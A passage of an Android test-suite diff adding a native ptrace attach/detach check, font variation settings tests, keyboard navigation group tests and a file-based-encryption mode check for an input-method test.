@@ -0,0 +1,71 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <jni.h>
+#include <android/log.h>
+
+#include <sys/ptrace.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define LOG_TAG "Cts-DebugTest"
+
+#define assert_or_exit(x) \
+ do { \
+ if(x) break; \
+ __android_log_print(ANDROID_LOG_ERROR, LOG_TAG, "Assertion " #x " failed. errno(%d): %s", \
+ errno, strerror(errno)); \
+ _exit(1); \
+ } while (0)
+#define assert_or_return(x) \
+ do { \
+ if(x) break; \
+ __android_log_print(ANDROID_LOG_ERROR, LOG_TAG, "Assertion " #x " failed. errno(%d): %s", \
+ errno, strerror(errno)); \
+ return false; \
+ } while (0)
+
+static bool parent(pid_t child) {
+ int status;
+ int wpid = waitpid(child, &status, 0);
+ assert_or_return(wpid == child);
+ assert_or_return(WIFEXITED(status));
+ assert_or_return(WEXITSTATUS(status ) == 0);
+ return true;
+}
+
+static bool child(pid_t parent) __attribute__((noreturn));
+static bool child(pid_t parent) {
+ assert_or_exit(ptrace(PTRACE_ATTACH, parent, nullptr, nullptr) == 0);
+ int status;
+ assert_or_exit(waitpid(parent, &status, __WALL) == parent);
+ assert_or_exit(WIFSTOPPED(status));
+ assert_or_exit(WSTOPSIG(status) == SIGSTOP);
+
+ assert_or_exit(ptrace(PTRACE_DETACH, parent, nullptr, nullptr) == 0);
+ _exit(0);
+}
+
+// public static native boolean ptraceAttach();
+extern "C" jboolean Java_android_debug_cts_DebugTest_ptraceAttach(JNIEnv *, jclass) {
+ pid_t pid = fork();
+ assert_or_return(pid >= 0);
+ if (pid != 0)
+ return parent(pid);
+ else
+ child(getppid());
+}
diff --git a/tests/tests/debug/src/android/debug/cts/DebugTest.java b/tests/tests/debug/src/android/debug/cts/DebugTest.java
new file mode 100644
index 0000000..9fae539
--- /dev/null
+++ b/tests/tests/debug/src/android/debug/cts/DebugTest.java
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.debug.cts;
+
+import junit.framework.TestCase;
+
+public class DebugTest extends TestCase {
+
+ static {
+ System.loadLibrary("debugtest");
+ }
+
+ public static native boolean ptraceAttach();
+
+ public void test_ptraceAttach() {
+ assertEquals(true, ptraceAttach());
+ }
+}
diff --git a/tests/tests/graphics/src/android/graphics/cts/PaintTest.java b/tests/tests/graphics/src/android/graphics/cts/PaintTest.java
index 4916ffa..15a3a43 100644
--- a/tests/tests/graphics/src/android/graphics/cts/PaintTest.java
+++ b/tests/tests/graphics/src/android/graphics/cts/PaintTest.java
@@ -900,6 +900,21 @@
}
@Test
+ public void testSetGetFontVariationSettings() {
+ Paint p = new Paint();
+
+ // The default variation settings should be null.
+ assertNull(p.getFontVariationSettings());
+
+ final String settings = "'wdth' 1.0";
+ p.setFontVariationSettings(settings);
+ assertEquals(settings, p.getFontVariationSettings());
+
+ p.setFontVariationSettings("");
+ assertNull(p.getFontVariationSettings());
+ }
+
+ @Test
public void testGetTextBounds() {
Paint p = new Paint();
p.setTextSize(10);
diff --git a/tests/tests/mediastress/preconditions/src/android/mediastress/cts/preconditions/MediaPreparer.java b/tests/tests/mediastress/preconditions/src/android/mediastress/cts/preconditions/MediaPreparer.java
index 2863410..13ff24b 100644
--- a/tests/tests/mediastress/preconditions/src/android/mediastress/cts/preconditions/MediaPreparer.java
+++ b/tests/tests/mediastress/preconditions/src/android/mediastress/cts/preconditions/MediaPreparer.java
@@ -269,6 +269,7 @@
BuildError, DeviceNotAvailableException {
if (mSkipMediaDownload) {
+ logInfo("Skipping media preparation");
return; // skip this precondition
}
setMountPoint(device);
diff --git a/tests/tests/print/src/android/print/cts/BasePrintTest.java b/tests/tests/print/src/android/print/cts/BasePrintTest.java
index 73d5285..bd1c8b3 100644
--- a/tests/tests/print/src/android/print/cts/BasePrintTest.java
+++ b/tests/tests/print/src/android/print/cts/BasePrintTest.java
@@ -93,7 +93,7 @@
/**
* This is the base class for print tests.
*/
-abstract class BasePrintTest {
+public abstract class BasePrintTest {
private final static String LOG_TAG = "BasePrintTest";
static final long OPERATION_TIMEOUT_MILLIS = 60000;
diff --git a/tests/tests/view/src/android/view/cts/FocusFinderTest.java b/tests/tests/view/src/android/view/cts/FocusFinderTest.java
index db2ee10..954a84a 100644
--- a/tests/tests/view/src/android/view/cts/FocusFinderTest.java
+++ b/tests/tests/view/src/android/view/cts/FocusFinderTest.java
@@ -234,4 +234,90 @@
nextFocus = mFocusFinder.findNextFocus(mLayout, mTopRight, View.FOCUS_BACKWARD);
assertTrue(nextFocus == mBottomRight || nextFocus == mBottomLeft);
}
+
+ // Tests for finding new groups don't look at geometrical properties of the views. For them,
+ // only tab order is important, which is mTopLeft, mTopRight, mBottomLeft. mBottomRight isn't
+ // used.
+ private void verifyNextGroup(
+ int groupType, View currentGroup, int direction, View expectedNextGroup) {
+ View actualNextGroup = mFocusFinder.findNextKeyboardNavigationGroup(
+ groupType, mLayout, currentGroup, direction);
+ assertEquals(expectedNextGroup, actualNextGroup);
+ }
+
+ @Test
+ public void testNoGroups() {
+ // No views are marked as groups, so next group is always null.
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mTopRight, View.FOCUS_FORWARD, null);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mTopRight, View.FOCUS_BACKWARD, null);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mTopRight, View.FOCUS_FORWARD, null);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mTopRight, View.FOCUS_BACKWARD, null);
+ }
+
+ @Test
+ public void testFindNextCluster() {
+ // Cluster navigation from all possible starting points in all directions.
+ mTopLeft.setKeyboardNavigationCluster(true);
+ mTopRight.setKeyboardNavigationCluster(true);
+ mBottomLeft.setKeyboardNavigationCluster(true);
+
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, null, View.FOCUS_FORWARD, mTopLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mTopLeft, View.FOCUS_FORWARD, mTopRight);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mTopRight, View.FOCUS_FORWARD, mBottomLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mBottomLeft, View.FOCUS_FORWARD, mLayout);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mBottomRight, View.FOCUS_FORWARD, mLayout);
+
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, null, View.FOCUS_BACKWARD, mBottomLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mTopLeft, View.FOCUS_BACKWARD, mLayout);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mTopRight, View.FOCUS_BACKWARD, mTopLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mBottomLeft, View.FOCUS_BACKWARD,
+ mTopRight);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, mBottomRight, View.FOCUS_BACKWARD, mLayout);
+ }
+
+ @Test
+ public void testFindNextSection() {
+ // Section navigation from all possible starting points in all directions.
+ mTopLeft.setKeyboardNavigationSection(true);
+ mTopRight.setKeyboardNavigationSection(true);
+ mBottomLeft.setKeyboardNavigationSection(true);
+
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_FORWARD, mTopLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mTopLeft, View.FOCUS_FORWARD, mTopRight);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mTopRight, View.FOCUS_FORWARD, mBottomLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mBottomLeft, View.FOCUS_FORWARD, mTopLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mBottomRight, View.FOCUS_FORWARD, mTopLeft);
+
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_BACKWARD, mBottomLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mTopLeft, View.FOCUS_BACKWARD, mBottomLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mTopRight, View.FOCUS_BACKWARD, mTopLeft);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mBottomLeft, View.FOCUS_BACKWARD,
+ mTopRight);
+ verifyNextGroup(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, mBottomRight, View.FOCUS_BACKWARD,
+ mBottomLeft);
+ }
}
diff --git a/tests/tests/view/src/android/view/cts/ViewGroupTest.java b/tests/tests/view/src/android/view/cts/ViewGroupTest.java
index 769e91e..57fb3b6 100644
--- a/tests/tests/view/src/android/view/cts/ViewGroupTest.java
+++ b/tests/tests/view/src/android/view/cts/ViewGroupTest.java
@@ -134,6 +134,87 @@
@UiThreadTest
@Test
+ public void testAddKeyboardNavigationGroups() {
+ View v1 = new MockView(mContext);
+ View v2 = new MockView(mContext);
+ mMockViewGroup.addView(v1);
+ mMockViewGroup.addView(v2);
+
+ // No groups.
+ ArrayList<View> list = new ArrayList<>();
+ mMockViewGroup.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, list, 0);
+ assertEquals(0, list.size());
+ mMockViewGroup.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, list, 0);
+ assertEquals(0, list.size());
+
+ // Children are a section and a cluster.
+ v1.setKeyboardNavigationCluster(true);
+ v2.setKeyboardNavigationSection(true);
+ mMockViewGroup.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, list, 0);
+ assertEquals(1, list.size());
+ assertEquals(v1, list.get(0));
+ list.clear();
+ mMockViewGroup.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, list, 0);
+ assertEquals(1, list.size());
+ assertEquals(v2, list.get(0));
+ list.clear();
+
+ // Nested groups. Should ignore children.
+ mMockViewGroup.setKeyboardNavigationCluster(true);
+ mMockViewGroup.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, list, 0);
+ assertEquals(1, list.size());
+ assertEquals(mMockViewGroup, list.get(0));
+ list.clear();
+ mMockViewGroup.setKeyboardNavigationCluster(false);
+ mMockViewGroup.setKeyboardNavigationSection(true);
+ mMockViewGroup.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, list, 0);
+ assertEquals(1, list.size());
+ assertEquals(mMockViewGroup, list.get(0));
+ list.clear();
+ mMockViewGroup.setKeyboardNavigationSection(false);
+
+ // Blocking descendants from getting focus also blocks group search.
+ mMockViewGroup.setDescendantFocusability(ViewGroup.FOCUS_BLOCK_DESCENDANTS);
+ mMockViewGroup.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, list, 0);
+ assertEquals(0, list.size());
+ mMockViewGroup.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, list, 0);
+ assertEquals(0, list.size());
+ mMockViewGroup.setDescendantFocusability(ViewGroup.FOCUS_BEFORE_DESCENDANTS);
+
+ // Testing the results ordering.
+ v2.setKeyboardNavigationSection(false);
+ v2.setKeyboardNavigationCluster(true);
+ mMockViewGroup.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, list, 0);
+ assertEquals(2, list.size());
+ assertEquals(v1, list.get(0));
+ assertEquals(v2, list.get(1));
+ list.clear();
+
+ // 3-level hierarchy.
+ ViewGroup parent = new MockViewGroup(mContext);
+ parent.addView(mMockViewGroup);
+ mMockViewGroup.removeView(v2);
+ v1.setKeyboardNavigationCluster(false);
+ v1.setKeyboardNavigationSection(true);
+ parent.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, list, 0);
+ assertEquals(1, list.size());
+ assertEquals(v1, list.get(0));
+ list.clear();
+
+ // Searching for sections doesn't enter clusters.
+ mMockViewGroup.setKeyboardNavigationCluster(true);
+ parent.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, list, 0);
+ assertEquals(0, list.size());
+ mMockViewGroup.setKeyboardNavigationCluster(false);
+
+ // Invisible children get ignored.
+ mMockViewGroup.setVisibility(View.GONE);
+ parent.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, list, 0);
+ assertEquals(0, list.size());
+ }
+
+ @UiThreadTest
+ @Test
public void testAddStatesFromChildren() {
mMockViewGroup.addView(mTextView);
assertFalse(mMockViewGroup.addStatesFromChildren());
diff --git a/tests/tests/view/src/android/view/cts/ViewTest.java b/tests/tests/view/src/android/view/cts/ViewTest.java
index 3ec74a8..4701fda 100644
--- a/tests/tests/view/src/android/view/cts/ViewTest.java
+++ b/tests/tests/view/src/android/view/cts/ViewTest.java
@@ -1171,6 +1171,106 @@
}
@Test
+ public void testAddKeyboardNavigationGroups() {
+ View view = new View(mActivity);
+ ArrayList<View> viewList = new ArrayList<>();
+
+ // View is not a keyboard navigation group
+ assertFalse(view.isKeyboardNavigationCluster());
+ assertFalse(view.isKeyboardNavigationSection());
+ assertEquals(0, viewList.size());
+
+ view.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, viewList, 0);
+ assertEquals(0, viewList.size());
+
+ view.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, viewList, 0);
+ assertEquals(0, viewList.size());
+
+ // View is a cluster
+ view.setKeyboardNavigationCluster(true);
+ view.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, viewList, 0);
+ assertEquals(0, viewList.size());
+
+ view.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, viewList, 0);
+ assertEquals(1, viewList.size());
+ assertEquals(view, viewList.get(0));
+
+ viewList.clear();
+ view.setKeyboardNavigationCluster(false);
+
+ // View is a section
+ view.setKeyboardNavigationSection(true);
+ view.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, viewList, 0);
+ assertEquals(0, viewList.size());
+
+ view.addKeyboardNavigationGroups(View.KEYBOARD_NAVIGATION_GROUP_SECTION, viewList, 0);
+ assertEquals(1, viewList.size());
+ assertEquals(view, viewList.get(0));
+ }
+
+ @Test
+ public void testKeyboardNavigationGroupSearch() {
+ mMockParent.setIsRootNamespace(true);
+ View v1 = new MockView(mActivity);
+ View v2 = new MockView(mActivity);
+ mMockParent.addView(v1);
+ mMockParent.addView(v2);
+
+ // Searching for clusters.
+ v1.setKeyboardNavigationCluster(true);
+ v2.setKeyboardNavigationCluster(true);
+ assertEquals(v2, mMockParent.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, v1, View.FOCUS_FORWARD));
+ assertEquals(v1, mMockParent.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, null, View.FOCUS_FORWARD));
+ assertEquals(v2, mMockParent.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, null, View.FOCUS_BACKWARD));
+ assertEquals(v2, v1.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, null, View.FOCUS_FORWARD));
+ assertEquals(mMockParent, v1.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, null, View.FOCUS_BACKWARD));
+ assertEquals(mMockParent, v2.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, null, View.FOCUS_FORWARD));
+ assertEquals(v1, v2.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_CLUSTER, null, View.FOCUS_BACKWARD));
+ v1.setKeyboardNavigationCluster(false);
+ v2.setKeyboardNavigationCluster(false);
+
+ // Searching for sections.
+ v1.setKeyboardNavigationSection(true);
+ v2.setKeyboardNavigationSection(true);
+ assertEquals(v2, mMockParent.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, v1, View.FOCUS_FORWARD));
+ assertEquals(v1, mMockParent.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_FORWARD));
+ assertEquals(v2, mMockParent.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_BACKWARD));
+ assertEquals(v2, v1.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_FORWARD));
+ assertEquals(v2, v1.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_BACKWARD));
+ assertEquals(v1, v2.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_FORWARD));
+ assertEquals(v1, v2.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_BACKWARD));
+
+ // Sections in 3-level hierarchy.
+ ViewGroup root = new MockViewParent(mActivity);
+ root.setIsRootNamespace(true);
+ View auntSection = new MockView(mActivity);
+ auntSection.setKeyboardNavigationSection(true);
+ root.addView(auntSection);
+ mMockParent.setIsRootNamespace(false);
+ root.addView(mMockParent);
+
+ assertEquals(auntSection, v2.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_FORWARD));
+ mMockParent.setKeyboardNavigationCluster(true);
+ assertEquals(v1, v2.keyboardNavigationGroupSearch(
+ View.KEYBOARD_NAVIGATION_GROUP_SECTION, null, View.FOCUS_FORWARD));
+ }
+
+ @Test
public void testGetRootView() {
MockView view = new MockView(mActivity);
diff --git a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
index b63a8bc..7303623 100644
--- a/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
+++ b/tests/tests/view/src/android/view/inputmethod/cts/InputMethodInfoTest.java
@@ -33,9 +33,11 @@
import android.content.pm.ServiceInfo;
import android.content.res.Resources;
import android.os.Parcel;
+import android.os.ParcelFileDescriptor;
import android.support.test.InstrumentationRegistry;
import android.support.test.filters.SmallTest;
import android.support.test.runner.AndroidJUnit4;
+import android.text.TextUtils;
import android.util.Printer;
import android.view.inputmethod.InputMethod;
import android.view.inputmethod.InputMethodInfo;
@@ -47,7 +49,10 @@
import org.junit.runner.RunWith;
import org.xmlpull.v1.XmlPullParserException;
+import java.io.BufferedReader;
import java.io.IOException;
+import java.io.InputStreamReader;
+import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
@@ -271,6 +276,11 @@
return;
}
+ if (!TextUtils.equals("native", getFbeMode())) {
+ // Skip the test unless the device is in native FBE mode.
+ return;
+ }
+
final InputMethodManager imm = mContext.getSystemService(InputMethodManager.class);
final List<InputMethodInfo> imis = imm.getInputMethodList();
boolean hasEncryptionAwareInputMethod = false;
@@ -290,4 +300,22 @@
}
assertTrue(hasEncryptionAwareInputMethod);
}
+
+ private String getFbeMode() {
+ try (ParcelFileDescriptor.AutoCloseInputStream in =
+ new ParcelFileDescriptor.AutoCloseInputStream(
+ InstrumentationRegistry
+ .getInstrumentation()
+ .getUiAutomation()
+ .executeShellCommand("sm get-fbe-mode"))) {
+ try (BufferedReader br =
+ new BufferedReader(new InputStreamReader(in, StandardCharsets.UTF_8))) {
+ // Assume that the output of "sm get-fbe-mode" is always one-line.
+ final String line = br.readLine();
+ return line != null ? line.trim() : "";
+ }
+ } catch (IOException e) {
+ return "";
+ }
+ }
}
diff --git a/tests/tests/widget/src/android/widget/cts/TextViewTest.java b/tests/tests/widget/src/android/widget/cts/TextViewTest.java
index 35dd635..8715c4c 100644
--- a/tests/tests/widget/src/android/widget/cts/TextViewTest.java
+++ b/tests/tests/widget/src/android/widget/cts/TextViewTest.java
@@ -3356,6 +3356,22 @@
"\"smcp\" on", mTextView.getFontFeatureSettings());
}
+ @UiThreadTest
+ @Test
+ public void testSetGetFontVariationSettings() {
+ mTextView = new TextView(mActivity);
+
+ // The default font variation settings should be null.
+ assertNull(mTextView.getFontVariationSettings());
+
+ final String setting = "'wdth' 2.0";
+ mTextView.setFontVariationSettings(setting);
+ assertEquals(setting, mTextView.getFontVariationSettings());
+
+ mTextView.setFontVariationSettings("");
+ assertNull(mTextView.getFontVariationSettings());
+ }
+
@Test
public void testGetOffsetForPositionSingleLineLtr() throws Throwable {
// asserts getOffsetPosition returns correct values for a single line LTR text